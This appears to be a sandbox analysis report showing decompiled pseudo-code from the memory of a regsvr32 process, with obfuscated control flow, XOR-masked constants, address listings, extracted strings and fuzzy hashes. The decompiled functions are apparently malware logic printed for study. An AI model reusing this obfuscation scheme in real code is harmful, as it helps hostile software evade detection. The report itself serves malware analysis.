								_v96 = _v96 * 0x7e;
								_v96 = _v96 ^ 0x01916519;
								_v112 = 0x476ab6;
								_v112 = _v112 << 5;
								_v112 = _v112 ^ 0xada8e6d8;
								_v112 = _v112 ^ 0xa54bd69c;
								_v108 = 0xee8f32;
								_v108 = _v108 | 0x137240ea;
								_v108 = _v108 / _t999;
								_v108 = _v108 ^ 0x00337494;
								_v104 = 0x56ae26;
								_v104 = _v104 << 4;
								_v104 = _v104 + 0xbd0c;
								_v104 = _v104 ^ 0x0564366f;
								E04F6845B(_v96, _v112, _v108, _v104, _t1112);
								_t1110 = 0xf1419;
								L24:
								_t1117 =  &(_t1117[3]);
								goto L25;
							} else {
								__eflags = _t984 - _t1037;
								if(__eflags == 0) {
									_v116 = 0xcaf02b;
									_v116 = _v116 ^ 0x199e233e;
									_v116 = _v116 + 0x5a12;
									_v116 = _v116 >> 0xc;
									_v116 = _v116 ^ 0x000f025e;
									_v112 = 0x46e322;
									_v112 = _v112 + 0x6699;
									_v112 = _v112 ^ 0x00492f66;
									_v108 = 0xcdead0;
									_v108 = _v108 >> 0xf;
									_v108 = _v108 ^ 0x000bf1ab;
									_v104 = 0x3556b3;
									_v104 = _v104 >> 4;
									_v104 = _v104 ^ 0x000c35f9;
									_t901 = E04F7D6A7(_v116, _v112, _v108, 0x4f616e8, _v104);
									_v124 = 0x3c7650;
									_v124 = _v124 + 0x640;
									_v124 = _v124 << 0x10;
									_v124 = _v124 ^ 0xc74e7546;
									_v124 = _v124 ^ 0xbbdf1fa7;
									_v120 = 0x229053;
									_v120 = _v120 << 5;
									_v120 = _v120 << 2;
									_v120 = _v120 ^ 0x0b083ffa;
									_v120 = _v120 ^ 0x1a4c7b11;
									_v112 = 0x21414d;
									_v112 = _v112 ^ 0x9a194128;
									_v112 = _v112 + 0xaa1c;
									_v112 = _v112 ^ 0x9a3bfb76;
									_v108 = 0x4fb09;
									_t1002 = 0x3a;
									_v108 = _v108 / _t1002;
									_v108 = _v108 >> 0xe;
									_v108 = _v108 ^ 0x00018120;
									_v116 = 0x470cb3;
									_v116 = _v116 << 0xc;
									_v116 = _v116 << 0xe;
									_v116 = _v116 ^ 0xcc087f96;
									_t1056 =  *0x4f8220c; // 0x0
									_t906 = E04F6E7F8(_t1002, _t1056 + 0x78, _t901, _v88, _v124, _v120, _v112,  &_v92, _v108, _v116);
									_v112 = 0xd9707f;
									__eflags = _t906;
									_t984 =  ==  ? 0x457da : _t1107;
									_v112 = _v112 * 0x4a;
									_v112 = _v112 ^ 0x3ed234fb;
									_v104 = 0xdc69d4;
									_v104 = _v104 | 0x4d7058d0;
									_v104 = _v104 ^ 0x4df17275;
									_v116 = 0x3ee025;
									_v116 = _v116 + 0xffff7004;
									_v116 = _v116 + 0xffffad62;
									_v116 = _v116 ^ 0xeaa2c072;
									_v116 = _v116 ^ 0xea94cbe8;
									_v108 = 0x7b1b72;
									_v108 = _v108 | 0x50a14d45;
									_v108 = _v108 ^ 0x1d4d8535;
									_v108 = _v108 ^ 0x4dbf19f5;
									E04F6845B(_v112, _v104, _v116, _v108, _t901);
									_t1117 =  &(_t1117[0xe]);
									goto L10;
								}
							}
						}
						L26:
					} while (_t984 != 0xdce1d);
					return _t1115;
				}
			}

0x04f7a0f3
0x04f7a0fc
0x04f7a104
0x04f7a107
0x04f7a10f
0x04f7a114
0x04f7a118
0x04f7a11d
0x04f7a125
0x04f7a12a
0x04f7a12a
0x04f7a12a
0x04f7a12f
0x04f7a134
0x04f7a139
0x04f7a139
0x04f7a139
0x04f7a139
0x04f7a13f
0x00000000
0x00000000
0x04f7a145
0x04f7aa05
0x04f7aa0f
0x04f7aa1e
0x04f7aa1f
0x04f7aa29
0x04f7aa2d
0x04f7aa35
0x04f7aa3d
0x04f7aa4a
0x04f7aa4e
0x04f7aa56
0x04f7aa5e
0x04f7aa66
0x04f7aa6e
0x04f7aa76
0x04f7aa7e
0x04f7aa86
0x04f7aa9a
0x04f7aaa1
0x00000000
0x04f7a14b
0x04f7a151
0x04f7a9fb
0x00000000
0x04f7a157
0x04f7a159
0x04f7a516
0x04f7a51e
0x04f7a523
0x04f7a52b
0x04f7a533
0x04f7a53b
0x04f7a543
0x04f7a54b
0x04f7a553
0x04f7a55b
0x04f7a560
0x04f7a568
0x04f7a56d
0x04f7a575
0x04f7a57d
0x04f7a585
0x04f7a5a2
0x04f7a5a7
0x04f7a5af
0x04f7a5b1
0x04f7a5b8
0x04f7a5c0
0x04f7a5c8
0x04f7a5d0
0x04f7a5de
0x04f7a5e3
0x04f7a5e9
0x04f7a5f1
0x04f7a5f9
0x04f7a605
0x04f7a608
0x04f7a60c
0x04f7a614
0x04f7a61c
0x04f7a624
0x04f7a641
0x04f7a646
0x04f7a650
0x04f7a658
0x04f7a65d
0x04f7a669
0x04f7a66d
0x04f7a675
0x04f7a67d
0x04f7a682
0x04f7a687
0x04f7a68f
0x04f7a697
0x04f7a69c
0x04f7a6a0
0x04f7a6a5
0x04f7a6ad
0x04f7a6b5
0x04f7a6c2
0x04f7a6c6
0x04f7a6ce
0x04f7a6d6
0x04f7a6e0
0x04f7a6e4
0x04f7a6ec
0x04f7a6f6
0x04f7a704
0x04f7a709
0x04f7a713
0x04f7a716
0x04f7a71a
0x04f7a722
0x04f7a73b
0x04f7a747
0x04f7a74d
0x04f7a751
0x04f7a759
0x04f7a761
0x04f7a76d
0x04f7a771
0x04f7a77f
0x04f7a783
0x04f7a78b
0x04f7a797
0x04f7a79f
0x04f7a7a3
0x04f7a7ab
0x04f7a7b3
0x04f7a7bb
0x04f7a7c3
0x04f7a7cf
0x04f7a7d3
0x04f7a7db
0x04f7a7e0
0x04f7a7e8
0x04f7a7f0
0x04f7a7f8
0x04f7a800
0x04f7a804
0x04f7a80c
0x04f7a811
0x04f7a819
0x04f7a821
0x04f7a826
0x04f7a82b
0x04f7a833
0x04f7a83b
0x04f7a848
0x04f7a84c
0x04f7a854
0x04f7a85c
0x04f7a861
0x04f7a869
0x04f7a871
0x04f7a879
0x04f7a881
0x04f7a8bb
0x04f7a8c0
0x04f7a8c8
0x04f7a8d4
0x04f7a8d7
0x04f7a8df
0x04f7a8e9
0x04f7a8f1
0x04f7a8f6
0x04f7a8fe
0x04f7a90c
0x04f7a910
0x04f7a914
0x04f7a91c
0x04f7a924
0x04f7a931
0x04f7a935
0x04f7a93d
0x04f7a955
0x04f7a95a
0x04f7a964
0x04f7a96c
0x04f7a974
0x04f7a97c
0x04f7a984
0x04f7a992
0x04f7a997
0x04f7a99d
0x04f7a9a5
0x04f7a9b1
0x04f7a9b5
0x04f7a9b9
0x04f7a9c1
0x04f7a9c9
0x04f7a9ce
0x04f7a9d6
0x04f7a9ee
0x04f7a9f3
0x00000000
0x04f7a15f
0x04f7a161
0x04f7a4a1
0x04f7a4b1
0x04f7a4b4
0x04f7a4b5
0x04f7a4b9
0x04f7a4c1
0x04f7a4c9
0x04f7a4d1
0x04f7a4d9
0x04f7a4e1
0x04f7a4f1
0x04f7a500
0x04f7a504
0x04f7a509
0x04f7a50b
0x04f7a50e
0x04f7a12a
0x04f7a12a
0x04f7a12a
0x04f7a12f
0x04f7a134
0x00000000
0x04f7a134
0x04f7a167
0x04f7a16d
0x04f7a173
0x04f7a184
0x04f7a187
0x04f7a18b
0x04f7a195
0x04f7a199
0x04f7a1a1
0x04f7a1a9
0x04f7a1b1
0x04f7a1b9
0x04f7a1c1
0x04f7a1c6
0x04f7a1ca
0x04f7a1d2
0x04f7a1da
0x04f7a1e8
0x04f7a1e9
0x04f7a1f5
0x04f7a1f9
0x04f7a216
0x04f7a21b
0x04f7a225
0x04f7a22f
0x04f7a237
0x04f7a246
0x04f7a249
0x04f7a253
0x04f7a254
0x04f7a25a
0x04f7a25f
0x04f7a267
0x04f7a26f
0x04f7a277
0x04f7a27f
0x04f7a28d
0x04f7a291
0x04f7a2ae
0x04f7a2b3
0x04f7a2bd
0x04f7a2cd
0x04f7a2d1
0x04f7a2d9
0x04f7a2e1
0x04f7a2e9
0x04f7a2f5
0x04f7a2ff
0x04f7a304
0x04f7a30a
0x04f7a312
0x04f7a31e
0x04f7a322
0x04f7a326
0x04f7a32e
0x04f7a333
0x04f7a33b
0x04f7a343
0x04f7a34b
0x04f7a34f
0x04f7a36d
0x04f7a372
0x04f7a386
0x04f7a389
0x04f7a38e
0x04f7a396
0x04f7a39e
0x04f7a3a6
0x04f7a3ab
0x04f7a3b3
0x04f7a3bb
0x04f7a3c3
0x04f7a3cb
0x04f7a3d3
0x04f7a3db
0x04f7a3e3
0x04f7a3fc
0x04f7a401
0x04f7a40b
0x04f7a413
0x04f7a41b
0x04f7a429
0x04f7a42e
0x04f7a438
0x04f7a43c
0x04f7a440
0x04f7a445
0x04f7a44d
0x04f7a455
0x04f7a45a
0x04f7a462
0x04f7a46a
0x04f7a472
0x04f7a48a
0x04f7a48f
0x04f7a492
0x04f7a492
0x04f7a497
0x04f7a497
0x04f7b07c
0x04f7b07c
0x04f7b081
0x04f7b086
0x04f7b086
0x04f7a16d
0x04f7a161
0x04f7a159
0x04f7a151
0x00000000
0x04f7a145
0x04f7aaa8
0x04f7aaaa
0x04f7b010
0x04f7b018
0x04f7b025
0x04f7b029
0x04f7b02e
0x04f7b036
0x04f7b03e
0x04f7b043
0x04f7b04b
0x04f7b053
0x04f7b057
0x04f7b057
0x04f7b057
0x04f7b06f
0x04f7b074
0x00000000
0x04f7aab0
0x04f7aab0
0x04f7aab2
0x04f7acc2
0x04f7acd3
0x04f7acd4
0x04f7acd8
0x04f7ace0
0x04f7ace8
0x04f7aced
0x04f7acf5
0x04f7ad03
0x04f7ad07
0x04f7ad0f
0x04f7ad17
0x04f7ad1f
0x04f7ad2c
0x04f7ad30
0x04f7ad38
0x04f7ad55
0x04f7ad5a
0x04f7ad62
0x04f7ad64
0x04f7ad6f
0x04f7ad7d
0x04f7ad81
0x04f7ad89
0x04f7ad91
0x04f7ad9d
0x04f7ada1
0x04f7ada9
0x04f7adb1
0x04f7adb6
0x04f7adba
0x04f7adc6
0x04f7adca
0x04f7add2
0x04f7add7
0x04f7addf
0x04f7ade4
0x04f7adec
0x04f7adf4
0x04f7adfc
0x04f7ae04
0x04f7ae0c
0x04f7ae14
0x04f7ae19
0x04f7ae21
0x04f7ae29
0x04f7ae37
0x04f7ae3c
0x04f7ae42
0x04f7ae4a
0x04f7ae52
0x04f7ae5f
0x04f7ae60
0x04f7ae69
0x04f7ae73
0x04f7ae77
0x04f7ae7f
0x04f7ae89
0x04f7ae91
0x04f7ae9f
0x04f7aea4
0x04f7aeaa
0x04f7aeb2
0x04f7aeba
0x04f7aebf
0x04f7aec7
0x04f7aecc
0x04f7aed4
0x04f7aedc
0x04f7aee4
0x04f7aef0
0x04f7aef3
0x04f7aefb
0x04f7af03
0x04f7af0b
0x04f7af13
0x04f7af25
0x04f7af3b
0x04f7af51
0x04f7af61
0x04f7af66
0x04f7af69
0x04f7af6b
0x04f7af74
0x04f7af6d
0x04f7af6f
0x04f7af71
0x04f7af71
0x04f7af79
0x04f7af8a
0x04f7af8c
0x04f7af90
0x04f7af98
0x04f7afa0
0x04f7afa5
0x04f7afad
0x04f7afb5
0x04f7afbd
0x04f7afcb
0x04f7afcf
0x04f7afd7
0x04f7afdf
0x04f7afe4
0x04f7afec
0x04f7b004
0x04f7b009
0x04f7b079
0x04f7b079
0x00000000
0x04f7aab8
0x04f7aab8
0x04f7aaba
0x04f7aac0
0x04f7aac8
0x04f7aad0
0x04f7aad8
0x04f7aadd
0x04f7aae5
0x04f7aaed
0x04f7aaf5
0x04f7aafd
0x04f7ab05
0x04f7ab0a
0x04f7ab12
0x04f7ab1a
0x04f7ab1f
0x04f7ab3c
0x04f7ab41
0x04f7ab4b
0x04f7ab55
0x04f7ab5a
0x04f7ab62
0x04f7ab6a
0x04f7ab72
0x04f7ab77
0x04f7ab7c
0x04f7ab84
0x04f7ab8c
0x04f7ab94
0x04f7ab9c
0x04f7aba4
0x04f7abac
0x04f7abba
0x04f7abc0
0x04f7abc4
0x04f7abc9
0x04f7abd1
0x04f7abd9
0x04f7abea
0x04f7abef
0x04f7ac0c
0x04f7ac1a
0x04f7ac1f
0x04f7ac27
0x04f7ac30
0x04f7ac38
0x04f7ac3c
0x04f7ac44
0x04f7ac4c
0x04f7ac54
0x04f7ac5c
0x04f7ac64
0x04f7ac6c
0x04f7ac74
0x04f7ac7c
0x04f7ac84
0x04f7ac8c
0x04f7ac94
0x04f7ac9c
0x04f7acb5
0x04f7acba
0x00000000
0x04f7acba
0x04f7aaba
0x04f7aab2
0x04f7b08b
0x04f7b08b
0x04f7b0a3
0x04f7b0a3

Strings

MA!, xrefs: 04F7AB8C
VsO, xrefs: 04F7A54B
<f, xrefs: 04F7A492
%>, xrefs: 04F7AC5C
<f, xrefs: 04F7A8CF
Rc&, xrefs: 04F7B04B
RVFC, xrefs: 04F7AD17
p&, xrefs: 04F7A6AD
&~, xrefs: 04F7A6B5
}, xrefs: 04F7A964
<f, xrefs: 04F7A118
%, xrefs: 04F7AE04
f], xrefs: 04F7A4D1

Memory Dump Source

Source File: 00000002.00000002.415134102.0000000004F61000.00000020.00001000.00020000.00000000.sdmp, Offset: 04F60000, based on PE: true

Associated: 00000002.00000002.415129850.0000000004F60000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.415356193.0000000004F82000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4f60000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: %>$&~$<f$<f$<f$MA!$RVFC$Rc&$VsO$f]$}$p&$%
API String ID: 0-926985475
Opcode ID: 06fd98453dd07f13aa77eb46fe5b053eed4b6721602d722970ea22f69e71a36a
Instruction ID: 07d03a57af82b6342fe50d4c37ff144c99a0a5c707019d6eb6f8c94bd57fb119
Opcode Fuzzy Hash: 06fd98453dd07f13aa77eb46fe5b053eed4b6721602d722970ea22f69e71a36a
Instruction Fuzzy Hash: 1592FC715093419FD348CF25C58A80BBBE1FBC8758F108A1EF59AA6260D3B5DA4ACF47

Uniqueness

Uniqueness Score: -1.00%

Function 04F65D99 Relevance: 17.0, Strings: 13, Instructions: 718
COMMONCrypto

Download Yara Rule

C-Code - Quality: 96%

			E04F65D99(void* __ecx, signed int* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, signed int _a24, intOrPtr _a28, intOrPtr _a32, signed int _a36, intOrPtr _a40) {
				char _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				unsigned int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _t791;
				void* _t802;
				void* _t803;
				signed int _t807;
				signed int _t821;
				signed int _t844;
				intOrPtr _t867;
				void* _t869;
				void* _t871;
				signed int _t875;
				signed int _t876;
				signed int _t883;
				signed int _t884;
				signed int _t887;
				signed int _t889;
				signed int _t890;
				signed int _t891;
				signed int _t892;
				signed int _t893;
				signed int _t894;
				signed int _t895;
				signed int _t904;
				signed int _t910;
				signed int _t912;
				void* _t918;
				signed int _t965;
				signed int _t969;
				signed int* _t972;
				signed int* _t974;
				void* _t976;

				_push(_a40);
				_t972 = __edx;
				_push(_a36 & 0x0000ffff);
				_push(_a32);
				_push(_a28);
				_push(_a24);
				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E04F732C4(_a36 & 0x0000ffff);
				_t963 = _a36;
				_t974 =  &(( &_v56)[0xc]);
				_v12 = 0;
				_v8 = 0x4a42a;
				_t965 = 0x857ef;
				_t869 = 0;
				while(1) {
					L1:
					_t791 = _v56;
					while(1) {
						L2:
						_t871 = 0x26824;
						while(1) {
							L3:
							_t918 = 0x872bb;
							do {
								while(1) {
									L4:
									_t976 = _t965 - 0x565ed;
									if(_t976 <= 0) {
										break;
									}
									__eflags = _t965 - 0x799a4;
									if(_t965 == 0x799a4) {
										_v24 = 0x301524;
										_v24 = _v24 + 0xffffc7e9;
										_v24 = _v24 ^ 0x002e1242;
										_v36 = 0xacd5ef;
										_v36 = _v36 ^ 0xad91fca5;
										_v36 = _v36 >> 5;
										_v36 = _v36 << 0xe;
										_v36 = _v36 ^ 0x7a5e9724;
										_v20 = 0xd710d3;
										_v20 = _v20 * 0xb;
										_t781 =  &_v20;
										 *_t781 = _v20 ^ 0x0937db22;
										__eflags =  *_t781;
										E04F69A95(_v24, _v36, _v20, _v8);
										_t965 = 0xafe8a;
										L39:
										_t918 = 0x872bb;
										_t871 = 0x26824;
									} else {
										__eflags = _t965 - 0x857ef;
										if(__eflags == 0) {
											_t965 = 0x565ed;
											continue;
										} else {
											__eflags = _t965 - _t918;
											if(_t965 == _t918) {
												_v56 = 0xe4b509;
												_v56 = _v56 >> 3;
												_v56 = _v56 + 0xfffff7d2;
												_v56 = _v56 ^ 0x001c8e70;
												_v40 = 0xc1337c;
												_v40 = _v40 ^ 0x16133921;
												_v40 = _v40 | 0x415e887c;
												_v40 = _v40 + 0xdeb0;
												_v40 = _v40 ^ 0x57d3ab0a;
												_v52 = 0x5443ae;
												_t883 = 0x24;
												_v52 = _v52 / _t883;
												_t884 = 0x4e;
												_push(_t884);
												_v52 = _v52 / _t884;
												_v52 = _v52 ^ 0x00095c43;
												_v48 = 0xb4b988;
												_v48 = _v48 >> 0xd;
												_v48 = _v48 << 0xc;
												_v48 = _v48 ^ 0x005f05b3;
												_v44 = 0x3a6ee8;
												_v44 = _v44 + 0x6d85;
												_v44 = _v44 >> 3;
												_v44 = _v44 ^ 0x00044ffc;
												_v36 = 0x9bf24d;
												_v36 = _v36 * 0x55;
												_v36 = _v36 >> 2;
												_v36 = _v36 + 0xffffc3e3;
												_v36 = _v36 ^ 0x0cff384b;
												_v24 = 0x10757c;
												_v24 = _v24 ^ 0x9a9c7614;
												_v24 = _v24 ^ 0x9a834b31;
												_v20 = 0x72eb5c;
												_v20 = _v20 | 0x5f36f6aa;
												_v20 = _v20 ^ 0x5f788e51;
												_v32 = 0xb65b98;
												_v32 = _v32 | 0x0cb79d44;
												_v32 = _v32 + 0xffffab6d;
												_v32 = _v32 ^ 0x0cb04fea;
												_t791 = E04F78A6A(_v56, _v40, _v52, _v48, _v44, _v36, _v24, _v20, _a12, _t884, _v32, _t884, _v8, _t884, _a36);
												_t974 =  &(_t974[0xe]);
												_v56 = _t791;
												__eflags = _t791;
												_t965 =  !=  ? 0xf717c : 0x799a4;
												goto L2;
											} else {
												__eflags = _t965 - 0xdade0;
												if(_t965 == 0xdade0) {
													_v40 = 0x2dd811;
													_v40 = _v40 << 0xd;
													_v40 = _v40 ^ 0x36575a42;
													_v40 = _v40 >> 0xc;
													_v40 = _v40 ^ 0x000c5c9d;
													_v36 = 0xab6f23;
													_v36 = _v36 + 0xffff2b4f;
													_v36 = _v36 * 0x66;
													_v36 = _v36 | 0xea49ab5f;
													_v36 = _v36 ^ 0xebf07f1f;
													_v32 = 0x29b6;
													_v32 = _v32 + 0x90b7;
													_v32 = _v32 * 0x29;
													_v32 = _v32 ^ 0x00159583;
													_v24 = 0x6ed32a;
													_v24 = _v24 >> 1;
													_v24 = _v24 ^ 0x0037bfb1;
													_v20 = 0x9da0a2;
													_v20 = _v20 ^ 0x9c546898;
													_v20 = _v20 ^ 0x9cc73178;
													_t887 =  *_t972;
													__eflags = _t887;
													if(_t887 == 0) {
														_t821 = 0;
														__eflags = 0;
													} else {
														_t821 = _a4;
													}
													E04F6A469(_v40, _t963, _v36, _t821, _v32, _t887, _t887, _v24, _v20, _a4);
													_t974 =  &(_t974[8]);
													asm("sbb esi, esi");
													_t965 = (_t965 & 0xfffe6950) + 0x4e289;
													while(1) {
														L1:
														_t791 = _v56;
														goto L2;
													}
												} else {
													__eflags = _t965 - 0xf717c;
													if(_t965 == 0xf717c) {
														__eflags =  *_t972;
														if( *_t972 == 0) {
															_t964 = _v12;
														} else {
															_v32 = 0xf2fadd;
															_t910 = 0x4f;
															_v32 = _v32 / _t910;
															_v32 = _v32 ^ 0x000f78dd;
															_v44 = 0x8d8651;
															_v44 = _v44 >> 0x10;
															_v44 = _v44 ^ 0x0da25382;
															_v44 = _v44 ^ 0x0daf225f;
															_v40 = 0x568cd3;
															_v40 = _v40 + 0xc80a;
															_v40 = _v40 << 7;
															_v40 = _v40 ^ 0x2baf3709;
															_v36 = 0xe25698;
															_v36 = _v36 >> 1;
															_v36 = _v36 >> 4;
															_v36 = _v36 ^ 0x000e560d;
															_t867 = E04F7D6A7(_v32, _v44, _v40, 0x4f613a8, _v36);
															_t964 = _t867;
															_t974 =  &(_t974[3]);
															_v12 = _t867;
														}
														_v36 = 0x288899;
														_v36 = _v36 | 0x4183d2e7;
														_v36 = _v36 >> 0xb;
														_v36 = _v36 + 0xe9dc;
														_v36 = _v36 ^ 0x00099f57;
														_v40 = 0x17712b;
														_v40 = _v40 | 0x4abafbc4;
														_v40 = _v40 + 0xfffffdcf;
														_t889 = 0x67;
														_v40 = _v40 / _t889;
														_v40 = _v40 ^ 0x00b98942;
														_v44 = 0x6ed1f2;
														_t890 = 0xe;
														_v44 = _v44 / _t890;
														_v44 = _v44 ^ 0xa8ed7497;
														_t891 = 0x12;
														_v44 = _v44 / _t891;
														_v44 = _v44 ^ 0x09225e2a;
														_v52 = 0x1c8669;
														_v52 = _v52 ^ 0x07d4fd44;
														_t892 = 0x3a;
														_v52 = _v52 / _t892;
														_v52 = _v52 >> 0xb;
														_v52 = _v52 ^ 0x0004044b;
														_v20 = 0x6d4ac3;
														_v20 = _v20 + 0xffff5cb9;
														_v20 = _v20 ^ 0x046ca77c;
														_v24 = 0x963c1b;
														_v24 = _v24 << 2;
														_v24 = _v24 ^ 0x0250f06c;
														_v48 = 0xcb9e8f;
														_t893 = 0x54;
														_v48 = _v48 / _t893;
														_t894 = 0x7d;
														_v48 = _v48 / _t894;
														_v48 = _v48 + 0xffff3ae0;
														_v48 = _v48 ^ 0xffff3dd6;
														_v28 = 0x70ab7e;
														_t895 = 0x32;
														_v28 = _v28 * 0x4b;
														_v28 = _v28 ^ 0x21023cea;
														_v32 = 0x985c52;
														_v32 = _v32 / _t895;
														_v32 = _v32 + 0x7987;
														_v32 = _v32 ^ 0x8003859d;
														_t904 = _v32 | _v28 | _v48 | _v24 | _v20 | _v52 | _v44 | _v40 | _v36;
														_t969 = _a24 & 1;
														__eflags = _t969;
														if(_t969 != 0) {
															_v20 = 0x8ec180;
															_v20 = _v20 + 0xffffbae4;
															_v20 = _v20 ^ 0x008e6c64;
															_v36 = 0xfe62fc;
															_v24 = 0x64;
															_v36 = _v36 / _v24;
															_v36 = _v36 + 0xffff3de1;
															_v36 = _v36 ^ 0x0001e91b;
															_v32 = 0x88597f;
															_v32 = _v32 ^ 0x46e96252;
															_v32 = _v32 + 0x69cb;
															_v32 = _v32 ^ 0x46e1a4f8;
															_t904 = _t904 | _v32 | _v36 | _v20;
															__eflags = _t904;
														}
														_v48 = 0xd26e28;
														_v48 = _v48 + 0xffffc800;
														_v48 = _v48 + 0xffffc2dc;
														_v48 = _v48 ^ 0x00d45211;
														_v24 = 0x8cf9ec;
														_v24 = _v24 ^ 0xe08b6d06;
														_v24 = _v24 ^ 0xe00647ac;
														_v40 = 0xaeb68;
														_v40 = _v40 | 0x2100974f;
														_v40 = _v40 >> 3;
														_v20 = 0x59;
														_push(_t904);
														_v40 = _v40 / _v20;
														_v40 = _v40 ^ 0x0004f27b;
														_v44 = 0xa4802e;
														_v44 = _v44 + 0xffff0e2e;
														_v44 = _v44 ^ 0xb7ad8983;
														_v44 = _v44 ^ 0xb70034f3;
														_v20 = 0xccd2d8;
														_v20 = _v20 >> 5;
														_v20 = _v20 ^ 0x0002aba3;
														_v36 = 0x8a6c26;
														_v36 = _v36 + 0xa196;
														_v36 = _v36 >> 3;
														_v36 = _v36 + 0x885f;
														_v36 = _v36 ^ 0x0013c9ee;
														_v32 = 0xc169c9;
														_v32 = _v32 | 0xdabf6efe;
														_v32 = _v32 ^ 0xdaf98651;
														_t844 = E04F72E17(_v48, _t964, _v24, _t904, _v40, _v44, _v20, _v36, _t904, _a28, _t904, _v32, _t904, _v56);
														_v32 = 0xc3eb05;
														_t963 = _t844;
														_v32 = _v32 | 0xb757df47;
														_v32 = _v32 ^ 0xb7d236a5;
														_v36 = 0x933b70;
														_v36 = _v36 | 0xf6ed97fb;
														_v36 = _v36 >> 0xc;
														_v36 = _v36 ^ 0x000bb7fd;
														_v24 = 0xa79243;
														_v24 = _v24 >> 6;
														_v24 = _v24 ^ 0x000be101;
														_v20 = 0x9ca05e;
														_v20 = _v20 * 0x25;
														_v20 = _v20 ^ 0x16a96eae;
														E04F6845B(_v32, _v36, _v24, _v20, _v12);
														_t974 =  &(_t974[0x10]);
														__eflags = _t844;
														if(__eflags == 0) {
															L12:
															_t965 = 0xe534;
															while(1) {
																L1:
																_t791 = _v56;
																goto L2;
															}
														} else {
															_v16 = 1;
															_v40 = 0xe3ec5b;
															_v40 = _v40 >> 0xf;
															_v40 = _v40 * 0x6e;
															_v40 = _v40 ^ 0x0000c3c3;
															_v24 = 0xa15714;
															_v24 = _v24 | 0x40eb542a;
															_v24 = _v24 ^ 0x40ee6397;
															_v36 = 0x5c4f45;
															_v36 = _v36 * 0x38;
															_v36 = _v36 + 0xffffd073;
															_v36 = _v36 ^ 0x1431ba76;
															_v20 = 0x5ffae1;
															_v20 = _v20 + 0x26cc;
															_v20 = _v20 ^ 0x0060189a;
															_v32 = 0x5a26d1;
															_v32 = _v32 | 0x91cc1033;
															_v32 = _v32 >> 0xb;
															_v32 = _v32 ^ 0x001934c5;
															E04F7C629(_t963, _v24,  &_v16, _v40, 4, _v36, _v20, _v32);
															_t974 =  &(_t974[6]);
															__eflags = _t969;
															if(__eflags != 0) {
																_v44 = 0x511583;
																_v44 = _v44 + 0xffff2472;
																_v44 = _v44 + 0x48b9;
																_v44 = _v44 ^ 0x005082b1;
																_v40 = 0x2a4317;
																_v40 = _v40 + 0xfffffc94;
																_v40 = _v40 + 0x6699;
																_v40 = _v40 ^ 0x002e5ff4;
																_v36 = 0x5092b2;
																_v36 = _v36 << 6;
																_v36 = _v36 + 0x2c2c;
																_v36 = _v36 ^ 0x1420a669;
																_v32 = 0x243975;
																_v32 = _v32 << 1;
																_v32 = _v32 >> 4;
																_v32 = _v32 ^ 0x0003b910;
																_v20 = 0x816273;
																_v20 = _v20 | 0xe38cccd1;
																_v20 = _v20 ^ 0xe38e4fbe;
																E04F7CAAC(_v44,  &_v4,  &_v16, _v40, _t963, _v36, _v32, _v20);
																_v16 = _v16 | 0x00000100;
																_v44 = 0x68c53b;
																_v44 = _v44 << 0x10;
																_v44 = _v44 + 0xffff182d;
																_v44 = _v44 ^ 0xc53a1832;
																_v48 = 0x9dc9c5;
																_v48 = _v48 * 0x38;
																_v48 = _v48 | 0x51a3805f;
																_v48 = _v48 ^ 0x73a89da7;
																_v40 = 0x51bf4a;
																_v40 = _v40 >> 8;
																_v40 = _v40 * 0x15;
																_v40 = _v40 ^ 0x00048336;
																_v32 = 0x6f3ced;
																_v32 = _v32 ^ 0x25dc5988;
																_v32 = _v32 + 0xffff7903;
																_v32 = _v32 ^ 0x25bfe21b;
																_v36 = 0x761cdb;
																_v36 = _v36 + 0xffff6eae;
																_v36 = _v36 + 0xffffb20f;
																_v36 = _v36 + 0xc594;
																_t629 =  &_v36;
																 *_t629 = _v36 ^ 0x00776ec0;
																__eflags =  *_t629;
																E04F7C629(_t963, _v48,  &_v16, _v44, _v4, _v40, _v32, _v36);
																_t974 =  &(_t974[0xc]);
															}
															_t965 = 0xdade0;
															while(1) {
																L1:
																_t791 = _v56;
																L2:
																_t871 = 0x26824;
																L3:
																_t918 = 0x872bb;
																goto L4;
															}
														}
													}
												}
											}
										}
									}
									goto L40;
								}
								if(_t976 == 0) {
									_v36 = 0xec67c3;
									_v36 = _v36 ^ 0x2e3792b9;
									_t965 = 0x3f787;
									_v36 = _v36 >> 9;
									_v36 = _v36 | 0xa6e8d726;
									_v36 = _v36 ^ 0xa6fffdfe;
									_v20 = 0x1f4077;
									_v20 = _v20 << 3;
									_v20 = _v20 ^ 0x00fd76a6;
									_v32 = 0x9979c0;
									_v32 = _v32 | 0x6e40d600;
									_v32 = _v32 + 0xffff58e5;
									_v32 = _v32 ^ 0x6eda4748;
									_v32 = 0x24d378;
									_v32 = _v32 + 0xffff51a8;
									_v32 = _v32 + 0xffffd0d4;
									_v32 = _v32 ^ 0x002f354d;
									_v32 = 0x78cd2b;
									_t875 = 0x39;
									_v32 = _v32 / _t875;
									_v32 = _v32 + 0x3576;
									_v32 = _v32 ^ 0x000f2ad3;
									_v36 = 0x28533b;
									_t876 = 3;
									_v36 = _v36 * 0xa;
									_v36 = _v36 << 2;
									_v36 = _v36 + 0x2d16;
									_v36 = _v36 ^ 0x064be3bb;
									_v36 = 0xbbaae6;
									_v36 = _v36 + 0xc44e;
									_v36 = _v36 >> 8;
									_v36 = _v36 >> 0xe;
									_v36 = _v36 ^ 0x00028ed1;
									_v32 = 0xb01959;
									_v32 = _v32 ^ 0xced53344;
									_v32 = _v32 >> 0x10;
									_v32 = _v32 ^ 0x0000ce65;
									_v32 = 0x96a86e;
									_v32 = _v32 >> 0xa;
									_v32 = _v32 / _t876;
									_v32 = _v32 ^ 0x0009b360;
									_v20 = 0xeda765;
									_v20 = _v20 * 0x5e;
									_v20 = _v20 ^ 0x57496663;
									_v20 = 0xa4c11e;
									_v20 = _v20 ^ 0x6dcaba03;
